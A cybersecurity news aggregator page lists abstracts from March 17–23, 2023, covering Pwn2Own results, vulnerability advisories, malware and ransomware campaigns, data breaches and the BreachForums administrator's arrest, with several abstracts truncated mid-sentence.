Pwn2Own Vancouver 2023 Day 1: Windows 11 and Tesla hacked Full Text
Abstract
On the first day of Pwn2Own Vancouver 2023, the organization awarded $375,000 (and a Tesla Model 3) for 12 zero-day flaws. The Pwn2Own Vancouver 2023 has begun, this hacking competition has 19 entries targeting nine different targets - including two Tesla...Security Affairs
March 23, 2023 – Business
Backslash Snags $8M Seed Financing for AppSec Tech Full Text
Abstract
The Israeli startup said the financing was provided by StageOne Ventures, First Rays Venture Partners, and D. E. Shaw & Co. A roster of prominent security practitioners and entrepreneurs also joined the round.Cyware
March 22, 2023 – Vulnerabilities
Netgear Orbi router vulnerable to arbitrary command execution Full Text
Abstract
Cisco Talos recently discovered four vulnerabilities in the Netgear Orbi mesh wireless system, including the main hub router and satellite routers that extend the network’s range.Cyware
March 22, 2023 – Government
CISA Alerts on Critical Security Vulnerabilities in Industrial Control Systems Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has released eight Industrial Control Systems (ICS) advisories on Tuesday, warning of critical flaws affecting equipment from Delta Electronics and Rockwell Automation. This includes 13 security vulnerabilities in Delta Electronics' InfraSuite Device Master, a real-time device monitoring software. All versions prior to 1.0.5 are affected by the issues. "Successful exploitation of these vulnerabilities could allow an unauthenticated attacker to obtain access to files and credentials, escalate privileges, and remotely execute arbitrary code," CISA said . Top of the list is CVE-2023-1133 (CVSS score: 9.8), a critical flaw that arises from the fact that InfraSuite Device Master accepts unverified UDP packets and deserializes the content , thereby allowing an unauthenticated remote attacker to execute arbitrary code. Two other deserialization flaws, CVE-2023-1139 (CVSS score: 8.8) and CVE-2023-1145The Hacker News
March 22, 2023 – Policy and Law
Enforcement of Cybersecurity Regulations: Part 1 Full Text
Abstract
As government policy moves toward more binding rules for cybersecurity, how should they be enforced? Self-assessment and self-certification are not likely to suffice.Lawfare
March 22, 2023 – Breach
Lionsgate streaming platform with 37m subscribers leaks user data Full Text
Abstract
Entertainment industry giant Lionsgate leaked users' IP addresses and information about what content they watch on its movie-streaming platform, according to research from Cybernews. Original post at https://cybernews.com/security/lionsgate-data-leak/ During...Security Affairs
March 22, 2023 – Malware
Emotet Adopts the Trend for OneNote Infection Full Text
Abstract
Security researcher abel took the wraps off Emotet’s new distribution technique that allows it to propagate through Microsoft OneNote email attachments. The operators have a history of deploying malicious macros on infected systems via Microsoft Word and Excel attachments. This new method of infect ... Read MoreCyware
March 22, 2023 – Malware
ScarCruft’s Evolving Arsenal: Researchers Reveal New Malware Distribution Techniques Full Text
Abstract
The North Korean advanced persistent threat (APT) actor dubbed ScarCruft is using weaponized Microsoft Compiled HTML Help (CHM) files to download additional malware. According to multiple reports from AhnLab Security Emergency response Center ( ASEC ), SEKOIA.IO , and Zscaler , the development is illustrative of the group's continuous efforts to refine and retool its tactics to sidestep detection. "The group is constantly evolving its tools, techniques, and procedures while experimenting with new file formats and methods to bypass security vendors," Zscaler researchers Sudeep Singh and Naveen Selvan said in a new analysis published Tuesday. ScarCruft, also tracked under the names APT37, Reaper, RedEyes, and Ricochet Chollima, has exhibited an increased operational tempo since the start of the year, targeting various South Korean entities for espionage purposes. It is known to be active since at least 2012. Last month, ASEC disclosed a campaign that employedThe Hacker News
March 22, 2023 – Malware
Rogue ChatGPT extension FakeGPT hijacked Facebook accounts Full Text
Abstract
A tainted version of the legitimate ChatGPT extension for Chrome, designed to steal Facebook accounts, has thousands of downloads. Guardio’s security team uncovered a new variant of a malicious Chat-GPT Chrome Extension that was already downloaded...Security Affairs
March 22, 2023 – Breach
NYC Special Needs Students’ Records Found Exposed on Web Full Text
Abstract
Tens of thousands of documents containing personal information of special education students within New York City's public school system were held in an unsecured database exposed to the internet.Cyware
March 22, 2023 – Education
Preventing Insider Threats in Your Active Directory Full Text
Abstract
Active Directory (AD) is a powerful authentication and directory service used by organizations worldwide. With this ubiquity and power comes the potential for abuse. Insider threats offer some of the most potentials for destruction. Many internal users have over-provisioned access and visibility into the internal network. Insiders' level of access and trust in a network leads to unique vulnerabilities. Network security often focuses on keeping a threat actor out, not on existing users' security and potential vulnerabilities. Staying on top of potential threats means protecting against inside and outside threats. Active Directory Vulnerabilities From the outside, a properly configured AD domain offers a secure authentication and authorization solution. But with complex social engineering and phishing email attacks, an existing AD user can become compromised. Once inside, threat actors have many options to attack Active Directory. Insecure Devices With "Bring Your OwnThe Hacker News
March 22, 2023 – Malware
Experts released PoC exploits for severe flaws in Netgear Orbi routers Full Text
Abstract
Cisco Talos researchers published PoC exploits for vulnerabilities in Netgear Orbi 750 series router and extender satellites. Netgear Orbi is a line of mesh Wi-Fi systems designed to provide high-speed, reliable Wi-Fi coverage throughout a home or business....Security Affairs
March 22, 2023 – Ransomware
Trigona Evolves TTPs, Targets Orgs Worldwide Full Text
Abstract
Trigona ransomware, which surfaced in December 2022, targeted at least 15 organizations across different sectors in the U.S., Australia, Italy, France, New Zealand, and Germany. The malware is capable of getting initial access, performing reconnaissance, transferring malware via a remote monitoring ... Read MoreCyware
March 22, 2023 – Malware
Rogue NuGet Packages Infect .NET Developers with Crypto-Stealing Malware Full Text
Abstract
The NuGet repository is the target of a new "sophisticated and highly-malicious attack" aiming to infect .NET developer systems with cryptocurrency stealer malware. The 13 rogue packages, which were downloaded more than 160,000 times over the past month, have since been taken down. "The packages contained a PowerShell script that would execute upon installation and trigger a download of a 'second stage' payload, which could be remotely executed," JFrog researchers Natan Nehorai and Brian Moussalli said . While NuGet packages have been in the past found to contain vulnerabilities and be abused to propagate phishing links , the development marks the first-ever discovery of packages with malicious code. Three of the most downloaded packages – Coinbase.Core, Anarchy.Wrapper.Net, and DiscordRichPresence.API – alone accounted for 166,000 downloads, although it's also possible that the threat actors artificially inflated the download counts using boThe Hacker News
March 22, 2023 – General
ENISA: Ransomware became a prominent threat against the transport sector in 2022 Full Text
Abstract
The European Union Agency for Cybersecurity (ENISA) published its first cyber threat landscape report for the transport sector. A new report published by the European Union Agency for Cybersecurity (ENISA) analyzes threats and incidents in the transport...Security Affairs
March 22, 2023 – Education
How to combat hardware Trojans by detecting microchip manipulations Full Text
Abstract
Researchers from Ruhr University Bochum, Germany, and the Max Planck Institute for Security and Privacy (MPI-SP) are pioneering innovative detection techniques to combat these hardware Trojans.Cyware
March 22, 2023 – Malware
NAPLISTENER: New Malware in REF2924 Group’s Arsenal for Bypassing Detection Full Text
Abstract
The threat group tracked as REF2924 has been observed deploying previously unseen malware in its attacks aimed at entities in South and Southeast Asia. The malware, dubbed NAPLISTENER by Elastic Security Labs, is an HTTP listener programmed in C# and is designed to evade "network-based forms of detection." REF2924 is the moniker assigned to an activity cluster linked to attacks against an entity in Afghanistan as well as the Foreign Affairs Office of an ASEAN member in 2022. The threat actor's modus operandi suggests overlaps with another hacking group dubbed ChamelGang , which was documented by Russian cybersecurity company Positive Technologies in October 2021. Attacks orchestrated by the group are said to have exploited internet-exposed Microsoft Exchange servers to deploy backdoors such as DOORME, SIESTAGRAPH, and ShadowPad. DOORME, an Internet Information Services ( IIS ) backdoor module, provides remote access to a contested network and executes additThe Hacker News
March 22, 2023 – Criminals
BreachForums current Admin Baphomet shuts down BreachForums Full Text
Abstract
Baphomet, the current administrator of BreachForums, announced that the popular hacking forum has been officially taken down. U.S. law enforcement arrested last week a US man that goes online with the moniker “Pompompurin,” the US citizen is accused...Security Affairs
March 22, 2023 – APT
Winter Vivern APT Targets European Government Entities With Aperetif Full Text
Abstract
SentinelOne spotted the Winter Vivern APT group targeting Polish government agencies, Indian government entities, the Ukraine Ministry of Foreign Affairs, and the Italy Ministry of Foreign Affairs in cyberespionage campaigns since 2021.Cyware
March 22, 2023 – Criminals
BreachForums Administrator Baphomet Shuts Down Infamous Hacking Forum Full Text
Abstract
In a sudden turn of events, Baphomet, the current administrator of BreachForums, said in an update on March 21, 2023, that the hacking forum has been officially taken down but emphasized that "it's not the end." "You are allowed to hate me, and disagree with my decision but I promise what is to come will be better for us all," Baphomet noted in a message posted on the BreachForums Telegram channel. The shutdown is suspected to have been prompted by suspicions that law enforcement may have obtained access to the site's configurations, source code, and information about the forum's users. The development follows the arrest of its administrator Conor Brian Fitzpatrick (aka "pompompurin"), who has been charged with a single count of conspiracy to commit access device fraud. Over the past few months, BreachForums filled the void left by RaidForums last year, becoming a lucrative destination to purchase and sell stolen databases from variouThe Hacker News
March 22, 2023 – Breach
Independent Living Systems data breach impacts more than 4M individuals Full Text
Abstract
US health services company Independent Living Systems (ILS) discloses a data breach that impacted more than 4 million individuals. US health services company Independent Living Systems (ILS) disclosed a data breach that exposed personal and medical...Security Affairs
March 21, 2023 – Phishing
Threat actors are experimenting with QR codes Full Text
Abstract
Data collected by the HP Threat Research team shows that from Q2 2022, attackers have been diversifying their techniques to find new ways to breach devices and steal data using QR code scam campaigns.Cyware
March 21, 2023 – Outage
New ‘Bad Magic’ Cyber Threat Disrupt Ukraine’s Key Sectors Amid War Full Text
Abstract
Amid the ongoing war between Russia and Ukraine, government, agriculture, and transportation organizations located in Donetsk, Lugansk, and Crimea have been attacked as part of an active campaign that drops a previously unseen, modular framework dubbed CommonMagic . "Although the initial vector of compromise is unclear, the details of the next stage imply the use of spear phishing or similar methods," Kaspersky said in a new report. The Russian cybersecurity company, which detected the attacks in October 2022, is tracking the activity cluster under the name "Bad Magic." Attack chains entail the use of booby-trapped URLS pointing to a ZIP archive hosted on a malicious web server. The file, when opened, contains a decoy document and a malicious LNK file that culminates in the deployment of a backdoor named PowerMagic. Written in PowerShell, PowerMagic establishes contact with a remote server and executes arbitrary commands, the results of which are exfiltraThe Hacker News
March 21, 2023 – General
Call for Papers: Cybersecurity Law and Policy Scholars Conference 2023 Full Text
Abstract
The third annual Cybersecurity Law and Policy Scholars Conference (CLPSC) will take place at the Fletcher School of Law & Diplomacy at Tufts University on September 29-30, 2023.Lawfare
March 21, 2023 – APT
New Bad Magic APT used CommonMagic framework in the area of Russo-Ukrainian conflict Full Text
Abstract
Threat actors are targeting organizations located in Donetsk, Lugansk, and Crimea with a previously undetected framework dubbed CommonMagic. In October 2022, Kaspersky researchers uncovered a malware campaign aimed at infecting government, agriculture...Security Affairs
March 21, 2023 – Vulnerabilities
Organizations Notified of Remotely Exploitable Vulnerabilities in Aveva HMI, SCADA Products Full Text
Abstract
Organizations that use human-machine interface (HMI) and supervisory control and data acquisition (SCADA) products from UK-based industrial software maker Aveva have been informed about the existence of several potentially serious vulnerabilities.Cyware
March 21, 2023 – Denial Of Service
New ShellBot DDoS Malware Variants Targeting Poorly Managed Linux Servers Full Text
Abstract
Poorly managed Linux SSH servers are being targeted as part of a new campaign that deploys different variants of a malware called ShellBot. "ShellBot, also known as PerlBot , is a DDoS Bot malware developed in Perl and characteristically uses IRC protocol to communicate with the C&C server," AhnLab Security Emergency response Center (ASEC) said in a report. ShellBot is installed on servers that have weak credentials, but only after threat actors make use of scanner malware to identify systems that have SSH port 22 open. A list of known SSH credentials is used to initiate a dictionary attack to breach the server and deploy the payload, after which it leverages the Internet Relay Chat ( IRC ) protocol to communicate with a remote server. This encompasses the ability to receive commands that allows ShellBot to carry out DDoS attacks and exfiltrate harvested information. ASEC said it identified three different ShellBot versions – LiGhT's Modded perlbot v2, DDoSThe Hacker News
March 21, 2023 – Botnet
New ShellBot bot targets poorly managed Linux SSH Servers Full Text
Abstract
New ShellBot DDoS bot malware, aka PerlBot, is targeting poorly managed Linux SSH servers, ASEC researchers warn. AhnLab Security Emergency response Center (ASEC) discovered a new variant of the ShellBot malware that was employed in a campaign that...Security Affairs
March 21, 2023 – General
The Role of Finance Departments in Cybersecurity Full Text
Abstract
A company’s finance department holds the company’s crown jewels: They ensure financial transactions and systems are secure. The finance department is a key component of a company’s overall security.Cyware
March 21, 2023 – General
The Best Defense Against Cyber Threats for Lean Security Teams Full Text
Abstract
H0lyGh0st, Magecart, and a slew of state-sponsored hacker groups are diversifying their tactics and shifting their focus to… You. That is, if you're in charge of cybersecurity for a small-to-midsize enterprise (SME). Why? Bad actors know that SMEs typically have a smaller security budget, less infosec manpower, and possibly weak or missing security controls to protect their data and infrastructure. So, how can you prepare for the imminent onslaught from new and emerging threat groups? You need a plan. Start with the NIST Cyber Security Framework The good news is you don't have to create your security strategy from scratch. The National Institute of Standards and Technology Cyber Security Framework (NIST CSF) is one of the most respected and widely used standards in the world. While originally designed for critical infrastructure industries, the NIST CSF is flexible enough for organizations of all sizes, sectors, and maturities to use in large part because the frameworThe Hacker News
March 21, 2023 – General
2022 Zero-Day exploitation continues at a worrisome pace Full Text
Abstract
Experts warn that 55 zero-day vulnerabilities were exploited in attacks carried out by ransomware and cyberespionage groups in 2022. Cybersecurity firm Mandiant reported that ransomware and cyberespionage groups exploited 55 zero-day flaws in attacks...Security Affairs
March 21, 2023 – Business
Aembit Scores $16.6M Seed Funding for Workload IAM Technology Full Text
Abstract
The Maryland-based cybersecurity company said the seed-stage financing was provided by Ballistic Ventures and Ten Eleven Ventures, two firms active in funding cybersecurity companies.Cyware
March 21, 2023 – General
From Ransomware to Cyber Espionage: 55 Zero-Day Vulnerabilities Weaponized in 2022 Full Text
Abstract
As many as 55 zero-day vulnerabilities were exploited in the wild in 2022, with most of the flaws discovered in software from Microsoft, Google, and Apple. While this figure represents a decrease from the year before, when a staggering 81 zero-days were weaponized, it still represents a significant uptick in recent years of threat actors leveraging unknown security flaws to their advantage. The findings come from threat intelligence firm Mandiant, which noted that desktop operating systems (19), web browsers (11), IT and network management products (10), and mobile operating systems (six) accounted for the most exploited product types. Of the 55 zero-day bugs, 13 are estimated to have been abused by cyber espionage groups, with four others exploited by financially motivated threat actors for ransomware-related operations. Commercial spyware vendors were linked to the exploitation of three zero-days. Among state-sponsored groups, those attributed to China have emerged as the mostThe Hacker News
March 21, 2023 – Breach
Ferrari confirms data breach after receiving a ransom demand from an unnamed extortion group Full Text
Abstract
Ferrari disclosed a data breach after receiving a ransom demand from an unnamed extortion group that gained access to some of its IT systems. Ferrari disclosed a data breach after it received a ransom demand from an unnamed extortion group that breached...Security Affairs
March 21, 2023 – Business
Mastercard acquires Baffin Bay Networks to improve customer security Full Text
Abstract
Baffin Bay Networks, based in Sweden, adds to Mastercard’s multi-layered approach to cybersecurity and helps to stop attacks, while mitigating exposure to risk across the ecosystem.Cyware
March 21, 2023 – Cryptocurrency
Hackers Steal Over $1.6 Million in Crypto from General Bytes Bitcoin ATMs Using Zero-Day Flaw Full Text
Abstract
Bitcoin ATM maker General Bytes disclosed that unidentified threat actors stole cryptocurrency from hot wallets by exploiting a zero-day security flaw in its software. "The attacker was able to upload his own java application remotely via the master service interface used by terminals to upload videos and run it using 'batm' user privileges," the company said in an advisory published over the weekend. "The attacker scanned the Digital Ocean cloud hosting IP address space and identified running CAS services on ports 7741, including the General Bytes Cloud service and other GB ATM operators running their servers on Digital Ocean," it further added. The company said that the server to which the malicious Java application was uploaded was by default configured to start applications present in the deployment folder ("/batm/app/admin/standalone/deployments/"). In doing so, the attack allowed the threat actor to access the database; read and decryThe Hacker News
March 21, 2023 – Criminals
Crooks stole more than $1.5M worth of Bitcoin from General Bytes ATMs Full Text
Abstract
Cryptocurrency ATM maker General Bytes suffered a security breach over the weekend, the hackers stole $1.5M worth of cryptocurrency. Cryptocurrency ATM manufacturers General Bytes suffered a security incident that resulted in the theft of $1.5M worth...Security Affairs
March 21, 2023 – APT
New APT Found Actively Using PowerMagic Backdoor and CommonMagic Framework Full Text
Abstract
In October 2022, Kaspersky researchers identified an active infection of government, agriculture, and transportation organizations located in the Donetsk, Lugansk, and Crimea regions.Cyware
March 21, 2023 – Breach
GOP lawmakers want additional details on CMS subcontractor breach timeline Full Text
Abstract
Details of Medicare beneficiaries that were exposed during the incident included names, addresses, dates of birth, phone numbers, social security numbers, and Medicare Beneficiary Identifiers.Cyware
March 20, 2023 – Attack
TeamTNT Allegedly Connected to SCARLETEEL Decoy Attack Full Text
Abstract
The SCARLETEEL sophisticated hacking operation, which targets Kubernetes hosted on Amazon to steal confidential proprietary data, also suspect to have a TeamTNT touch. Despite all the similarities, researchers could not connect the two malware with full confidence. According to them, it is possible ... Read MoreCyware
March 20, 2023 – Malware
New DotRunpeX Malware Delivers Multiple Malware Families via Malicious Ads Full Text
Abstract
A new piece of malware dubbed dotRunpeX is being used to distribute numerous known malware families such as Agent Tesla , Ave Maria , BitRAT , FormBook , LokiBot , NetWire , Raccoon Stealer , RedLine Stealer , Remcos , Rhadamanthys , and Vidar . "DotRunpeX is a new injector written in .NET using the Process Hollowing technique and used to infect systems with a variety of known malware families," Check Point said in a report published last week. Said to be in active development, dotRunpeX arrives as a second-stage malware in the infection chain, often deployed via a downloader (aka loader) that's transmitted through phishing emails as malicious attachments. Alternatively, it's known to leverage malicious Google Ads on search result pages to direct unsuspecting users searching for popular software such as AnyDesk and LastPass to copycat sites hosting trojanized installers. The latest DotRunpeX artifacts, first spotted in October 2022, add an extra oThe Hacker News
March 20, 2023 – Vulnerabilities
Acropalypse flaw in Google Pixel’s Markup tool allowed the recovery of edited images Full Text
Abstract
The Acropalypse flaw in the Markup tool of Google Pixel allowed the partial recovery of edited or redacted screenshots and images. Security researchers Simon Aarons and David Buchanan have discovered a vulnerability, named 'Acropalypse,' in the Markup...Security Affairs
March 20, 2023 – Criminals
Killnet Aggressively Targets Healthcare Organizations Full Text
Abstract
KillNet, a cybercriminal collective with ties to Russia, was spotted targeting Microsoft Azure-hosted healthcare apps for more than three months. The highest number of these attacks were launched in February, targeting hospitals, pharma, life science, healthcare insurance, and health services in mo ... Read MoreCyware
March 20, 2023 – Breach
Mispadu Banking Trojan Targets Latin America: 90,000+ Credentials Stolen Full Text
Abstract
A banking trojan dubbed Mispadu has been linked to multiple spam campaigns targeting countries like Bolivia, Chile, Mexico, Peru, and Portugal with the goal of stealing credentials and delivering other payloads. The activity, which commenced in August 2022, is currently ongoing, Ocelot Team from Latin American cybersecurity firm Metabase Q said in a report shared with The Hacker News. Mispadu (aka URSA) was first documented by ESET in November 2019, describing its ability to perpetrate monetary and credential theft and act as a backdoor by taking screenshots and capturing keystrokes. "One of their main strategies is to compromise legitimate websites, searching for vulnerable versions of WordPress, to turn them into their command-and-control server to spread malware from there, filtering out countries they do not wish to infect, dropping different type of malware based on the country being infected," researchers Fernando García and Dan Regalado said. It's alsoThe Hacker News
March 20, 2023 – Hacker
Threat actors abuse Adobe Acrobat Sign to distribute RedLine info-stealer Full Text
Abstract
Threat actors are abusing the legitimate Adobe Acrobat Sign service to distribute the RedLine information stealer. Avast researchers reported that threat actors are abusing the legitimate Adobe Acrobat Sign service to distribute the RedLine information...Security Affairs
March 20, 2023 – Breach
After Data Breaches, Lawsuits Hit Two Arkansas Hospitals Full Text
Abstract
Since January, four lawsuits have been filed against both Howard Memorial Hospital of Nashville and against the Mena Hospital Commission, which operates as the Mena Regional Health System.Cyware
March 20, 2023 – Breach
New Cyber Platform Lab 1 Decodes Dark Web Data to Uncover Hidden Supply Chain Breaches Full Text
Abstract
2022 was the year when inflation hit world economies, except in one corner of the global marketplace – stolen data. Ransomware payments fell by over 40% in 2022 compared to 2021. More organisations chose not to pay ransom demands, according to findings by blockchain firm Chainalysis. Nonetheless, stolen data has value beyond a price tag, and in risky ways you may not expect. Evaluating stolen records is what Lab 1, a new cyber monitoring platform , believes will make a big difference for long-term cybersecurity resilience. Think of data value this way: Stolen credentials can become future phishing attacks Logins for adult websites are potential extortion attempts Travel and location data are a risk to VIPs and senior leadership, And so on… Hackers could retaliate for non-payment by simply posting their loot to forums where the data will be available for further enrichment and exploitation. Shining a light on dark places Even though your company may not have suffered a diThe Hacker News
March 20, 2023 – Malware
Emotet is back after a three-month hiatus Full Text
Abstract
The infamous Emotet malware is back after a short hiatus, threat actors are spreading it via Microsoft OneNote email attachments. The Emotet malware returns after a three-month hiatus and threat actors are distributing it via Microsoft OneNote email...Security Affairs
March 20, 2023 – Outage
Bitcoin ATM Maker General Bytes Shuts Cloud Service After Security Breach Full Text
Abstract
In a patch release bulletin, General Bytes warned that a hacker has been able to remotely upload and run a Java application via the master service interface into its terminals aimed at stealing user information and sending funds from hot wallets.Cyware
March 20, 2023 – Ransomware
Researchers Shed Light on CatB Ransomware’s Evasion Techniques Full Text
Abstract
The threat actors behind the CatB ransomware operation have been observed using a technique called DLL search order hijacking to evade detection and launch the payload. CatB, also referred to as CatB99 and Baxtoy, emerged late last year and is said to be an "evolution or direct rebrand" of another ransomware strain known as Pandora based on code-level similarities. It's worth noting that the use of Pandora has been attributed to Bronze Starlight (aka DEV-0401 or Emperor Dragonfly), a China-based threat actor that's known to employ short-lived ransomware families as a ruse to likely conceal its true objectives. One of the key defining characteristics of CatB is its reliance on DLL hijacking via a legitimate service called Microsoft Distributed Transaction Coordinator ( MSDTC ) to extract and launch the ransomware payload. "Upon execution, CatB payloads rely on DLL search order hijacking to drop and load the malicious payload," SentinelOne researcThe Hacker News
March 20, 2023 – Attack
Play ransomware gang hit Dutch shipping firm Royal Dirkzwager Full Text
Abstract
Dutch maritime logistics company Royal Dirkzwager suffered a ransomware attack, the company was hit by the Play ransomware gang. The Play ransomware group hit the Dutch maritime logistics company Royal Dirkzwager. Royal Dirkzwager is specialized...Security Affairs
March 20, 2023 – Breach
Orlando Family Physicians data breach class action settlement Full Text
Abstract
The settlement benefits consumers who received a data breach notification from Orlando Family Physicians informing them their personal information or protected health information may have been compromised in a data breach on April 15, 2021.Cyware
March 20, 2023 – Malware
Emotet Rises Again: Evades Macro Security via OneNote Attachments Full Text
Abstract
The notorious Emotet malware, in its return after a short hiatus , is now being distributed via Microsoft OneNote email attachments in an attempt to bypass macro-based security restrictions and compromise systems. Emotet , linked to a threat actor tracked as Gold Crestwood, Mummy Spider, or TA542, continues to be a potent and resilient threat despite attempts by law enforcement to take it down. A derivative of the Cridex banking worm – which was subsequently replaced by Dridex around the same time GameOver Zeus was disrupted in 2014 – Emotet has evolved into a "monetized platform for other threat actors to run malicious campaigns on a pay-per-install (PPI) model, allowing theft of sensitive data and ransom extortion." While Emotet infections have acted as a conduit to deliver Cobalt Strike, IcedID, Qakbot, Quantum ransomware, and TrickBot, its return in late 2021 was facilitated by means of TrickBot. "Emotet is known for extended periods of inaThe Hacker News
March 20, 2023 – General
IT security spending to reach nearly $300 billion by 2026 Full Text
Abstract
Investments in cybersecurity are expected to reach nearly $300 billion in 2026, driven by the ongoing threat of cyberattacks, the demands of providing a secure hybrid work environment, and the need to meet data privacy and governance requirements.Cyware
March 19, 2023 – General
Security Affairs newsletter Round 411 by Pierluigi Paganini Full Text
Abstract
A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs are free for you in your email box. If you want to also receive for free the newsletter with the international press subscribe here. Kaspersky...Security Affairs
March 19, 2023 – Breach
Lowe’s Market chain leaves client data up for grabs Full Text
Abstract
A misconfiguration on a website owned by the US-based Lowe’s Market grocery store chain could have allowed threat actors to gain control of its systems. On February 7, the Cybernews research team discovered a misconfiguration on the Lowe's Market...Security Affairs
March 19, 2023 – Breach
NBA is warning fans of a data breach after a third-party newsletter service hack Full Text
Abstract
The NBA (National Basketball Association) disclosed a data breach after a third-party firm providing a newsletter service was breached. The NBA (National Basketball Association) is notifying followers of a data breach after a third-party company providing...Security Affairs
March 18, 2023 – Vulnerabilities
Actively Exploited Microsoft Outlook Vulnerability Imperils Microsoft 365 Apps Full Text
Abstract
Discovered in or around the beginning of March, the Microsoft Outlook vulnerability was found to affect several applications from the Microsoft 365 Apps Enterprise stack, including MS Office 2019, 2016, 2013, and LTSC.Cyware
March 18, 2023 – Hacker
Chinese Hackers Exploit Fortinet Zero-Day Flaw for Cyber Espionage Attack Full Text
Abstract
The zero-day exploitation of a now-patched medium-severity security flaw in the Fortinet FortiOS operating system has been linked to a suspected Chinese hacking group. Threat intelligence firm Mandiant, which made the attribution, said the activity cluster is part of a broader campaign designed to deploy backdoors onto Fortinet and VMware solutions and maintain persistent access to victim environments. The Google-owned threat intelligence and incident response firm is tracking the malicious operation under its uncategorized moniker UNC3886 , a China-nexus threat actor. "UNC3886 is an advanced cyber espionage group with unique capabilities in how they operate on-network as well as the tools they utilize in their campaigns," Mandiant researchers said in a technical analysis. "UNC3886 has been observed targeting firewall and virtualization technologies which lack EDR support. Their ability to manipulate firewall firmware and exploit a zero-day indicates they haveThe Hacker News
March 18, 2023 – Ransomware
QBot Laying the Foundations for Black Basta Ransomware Activity Full Text
Abstract
The attacker’s actions had the whiff of a Black Basta affiliate, with Qbot activity widely reported as being a cornerstone of Black Basta intrusions. Black Basta is a splinter group that emerged after the “Conti” ransomware syndicate was quelled.Cyware
March 18, 2023 – Breach
Hitachi Energy breached by Clop gang through GoAnywhere Zero-Day exploitation Full Text
Abstract
Hitachi Energy immediately launched an investigation into the incident and disconnected the compromised system. The company reported the data breach to law enforcement agencies and data protection watchdog.Cyware
March 18, 2023 – Government
US Government Warns Organizations of LockBit 3.0 Ransomware Attacks Full Text
Abstract
Also referred to as LockBit Black, LockBit 3.0 has a more modular architecture compared to its previous variants, and supports various arguments that modify its behavior after deployment.Cyware
March 18, 2023 – Ransomware
Kaspersky released a new decryptor for Conti-based ransomware Full Text
Abstract
Kaspersky released a new version of the decryptor for the Conti ransomware that is based on the previously leaked source code of the malware. Kaspersky has published a new version of a decryption tool for the Conti ransomware based on previously leaked...Security Affairs
March 18, 2023 – Hacker
Chinese Hackers Targeting Security and Network Appliances With Custom Backdoors Full Text
Abstract
Chinese hackers exploited a critical Fortinet bug and used custom networking malware to steal credentials and maintain network access, according to Mandiant. Victims include defense, telecom, and technology firms, as well as government agencies.Cyware
March 18, 2023 – Government
US govt agencies released a joint alert on the Lockbit 3.0 ransomware Full Text
Abstract
The US government released a joint advisory that provides technical details about the operation of the Lockbit 3.0 ransomware gang. The U.S. Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State...Security Affairs
March 18, 2023 – Criminals
Feds arrested Pompompurin, the alleged owner of BreachForums Full Text
Abstract
U.S. law enforcement arrested this week a US citizen suspected to be Pompompurin, the notorious owner of the BreachForums cybercrime forum. U.S. law enforcement arrested this week a US man that goes online with the moniker "Pompompurin," the US citizen...Security Affairs
March 18, 2023 – Ransomware
Bee-Ware of Trigona, An Emerging Ransomware Strain Full Text
Abstract
By analyzing Trigona ransomware binaries and ransom notes from VirusTotal, as well as information from incident response, Unit 42 determined that Trigona was very active during December 2022, with at least 15 potential victims being compromised.Cyware
March 18, 2023 – Criminals
Pompompurin Unmasked: Infamous BreachForums Mastermind Arrested in New York Full Text
Abstract
U.S. law enforcement authorities have arrested a New York man in connection with running the infamous BreachForums hacking forum under the online alias " Pompompurin ." The development, first reported by Bloomberg Law , comes after News 12 Westchester, earlier this week, said that federal investigators "spent hours inside and outside of a home in Peekskill." "At one point, investigators were seen removing several bags of evidence from the house," the New York-based local news service added . According to an affidavit filed by the Federal Bureau of Investigation (FBI), the suspect identified himself as Conor Brian Fitzpatrick and that he admitted to being the owner of the BreachForums website. "When I arrested the defendant on March 15, 2023, he stated to me in substance and in part that: a) his name was Conor Brian Fitzpatrick; b) he used the alias 'pompompurin,' and c) he was the owner and administrator of 'BreachForums,'&The Hacker News
March 18, 2023
LockBit 3.0 Ransomware: Inside the Cyberthreat That’s Costing Millions Full Text
Abstract
U.S. government agencies have released a joint cybersecurity advisory detailing the indicators of compromise (IoCs) and tactics, techniques, and procedures (TTPs) associated with the notorious LockBit 3.0 ransomware . "The LockBit 3.0 ransomware operations function as a Ransomware-as-a-Service (RaaS) model and is a continuation of previous versions of the ransomware, LockBit 2.0, and LockBit," the authorities said . The alert comes courtesy of the U.S. Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing & Analysis Center (MS-ISAC). Since emerging in late 2019, the LockBit actors have invested significant technical efforts to develop and fine-tune its malware, issuing two major updates — LockBit 2.0, released in mid-2021, and LockBit 3.0 , released in June 2022. The two versions are also known as LockBit Red and LockBit Black, respectively. "LockBit 3.0 accepts additionThe Hacker News
March 17, 2023 – Breach
Hitachi Energy breached by Clop gang through GoAnywhere Zero-Day exploitation Full Text
Abstract
Hitachi Energy disclosed a data breach, the Clop ransomware gang stole the company data by exploiting the recent GoAnywhere zero-day flaw. Hitachi Energy disclosed a data breach, the company was hacked by the Clop ransomware gang that stole its data...Security Affairs
March 17, 2023 – APT
China-based Tick APT Deploys Custom Malware and Use Other Tools Full Text
Abstract
ESET researchers found that the Tick cyberespionage group compromised an East Asian Data-Loss Prevention (DLP) company in 2021 and used a wide range of tools in similar attacks. In one of its campaigns, it used a tampered version of a legitimate app called Q-Dir to drop an open-source VBScript back ... Read MoreCyware
March 17, 2023 – Botnet
HinataBot, a new Go-Based DDoS botnet in the threat landscape Full Text
Abstract
A new Golang-based DDoS botnet, tracked as HinataBot, targets routers and servers by exploiting known vulnerabilities. Akamai researchers spotted a new DDoS Golang-based botnet, dubbed HinataBot, which has been observed exploiting known flaws...Security Affairs
March 17, 2023 – General
Is Russia regrouping for renewed cyberwar? Full Text
Abstract
As of late November 2022, Microsoft and other security firms identified a new form of ransomware, called “Sullivan”, deployed against Ukrainian targets, in addition to the “Prestige” ransomware Russia deployed in Ukraine and Poland in October 2022.Cyware
March 17, 2023 – Phishing
FakeCalls Vishing Malware Targets South Korean Users via Popular Financial Apps Full Text
Abstract
